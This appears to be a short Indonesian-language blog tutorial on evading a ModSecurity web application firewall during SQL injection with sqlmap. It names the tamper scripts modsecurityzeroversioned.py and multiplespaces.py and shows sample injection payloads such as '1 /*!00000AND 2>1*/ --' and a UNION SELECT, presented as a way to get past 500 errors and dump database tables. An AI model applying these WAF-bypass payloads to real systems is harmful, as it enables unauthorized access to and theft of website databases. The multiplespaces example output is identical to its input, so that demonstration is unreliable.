Apa Kalian Mencari teknik bypass 500 Internal Server Error? Ketika Mau Retriv db (enumerate Database) Muncul Error Kode 500
How To Bypass ?
Cek Dulu WAF NYA.
[21:15:07] [CRITICAL] WAF/IPS identified as ‘ModSecurity: Open Source Web Application Firewall (Trustwave)’
Mod Security ok. Mari Kita Bypass Menggunakan tamper script
dsini saya gunakan modsecurityzeroversioned.py >> dengan payload >>> tamper(‘1 AND 2>1 — ‘)
‘1 /*!00000AND 2>1*/ — ‘
‘1 /*!00000AND 2>1*/ — ‘
terbypas ea.
Kasus lainnya adalah Dump Table Tetapi Tidak Bisa Karena Table tersebut tidak ada dalam database.
Ok Kali ini saya mau dump salah satu table di bawah ini
[21:30:57] [WARNING] Unable to enumerate the columns for table in database
500 (Internal Server Error) — 9 times
How To Bypass ?
tambah lagi tamper multiplespaces.py
payload :
>>> random.seed(0)
>>> tamper(‘1 UNION SELECT foobar’)
‘1 UNION SELECT foobar’
>>> tamper(‘1 UNION SELECT foobar’)
‘1 UNION SELECT foobar’
Terbypass Ya. Thx Rexha